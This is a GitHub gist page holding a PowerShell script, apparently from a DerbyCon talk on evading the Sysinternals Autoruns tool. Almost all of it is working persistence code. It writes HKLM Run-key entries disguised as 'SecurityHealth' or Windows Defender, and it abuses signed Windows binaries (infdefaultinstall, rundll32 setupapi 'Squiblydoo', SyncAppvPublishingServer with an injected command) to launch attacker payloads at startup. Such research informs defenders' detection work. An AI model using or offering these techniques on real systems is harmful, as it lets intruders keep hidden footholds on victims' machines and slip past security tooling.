Create a gist now

Instantly share code, notes, and snippets.

@ConsciousHacker /AutoRuns.ps1 Secret
Last active Oct 25, 2017

Embed
What would you like to do?
DerbyCon Autoruns Talk
<#
AutoRuns v1.0
License: GPLv3
Author: @ConsciousHacker
Credits: @HuntressLabs
References: https://github.com/huntresslabs/evading-autoruns
#>
function InstallAutoRuns-COM
{
#Place your com scriptlet in C:\Program Files\Windows Defender\ as "MSASCuiL.com"
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$FakeProgramName = "SecurityHealth"
$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui"'
Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString
}
function UninstallAutoRuns-COM
{
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$FakeProgramName = "SecurityHealth"
$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui.exe"'
Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString
}
function InstallAutoRuns-INFDefaultInstall
{
param
(
[Parameter(Mandatory = $True)]
[string]$Path
)
# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
# TODO: Generate inf file
# TODO: param for registry key name
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$infpath = $Path
$infdefaultinstall = "INF Default Install"
$ComScriptlet = '"C:\Windows\system32\infdefaultinstall.exe ' + $infpath + '"'
Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString
}
function UninstallAutoRuns-INFDefaultInstall
{
param
(
[Parameter(Mandatory = $True)]
[string]$Path
)
# TODO: param for registry key name
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$infpath = $Path
$infdefaultinstall = "INF Default Install"
Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall
}
function InstallAutoRuns-SquiblydooINF
{
param
(
[Parameter(Mandatory = $True)]
[string]$Path
)
# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
# TODO: Generate inf file
# TODO: param for registry key name
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$infpath = $Path
$infdefaultinstall = "Squiblydoo"
$ComScriptlet = '"C:\Windows\system32\rundll32.exe setupapi,InstallHinfSection ModelsSection 128 ' + $infpath + '"'
Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString
}
function UninstallAutoRuns-SquiblydooINF
{
param
(
[Parameter(Mandatory = $True)]
[string]$Path
)
# TODO: param for registry key name
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$infpath = $Path
$infdefaultinstall = "Squiblydoo"
Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall
}
function InstallAutoRuns-SyncAppvPublishing
{
param
(
[Parameter(Mandatory = $True)]
[string]$Cmd
)
$SyncAppvPublishing = '"C:\Windows\system32\SyncAppvPublishingServer.exe".; ' + $Cmd + '""'
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing" -Value $SyncAppvPublishing -Type ExpandString
}
function UninstallAutoRuns-SyncAppvPublishing
{
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Remove-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment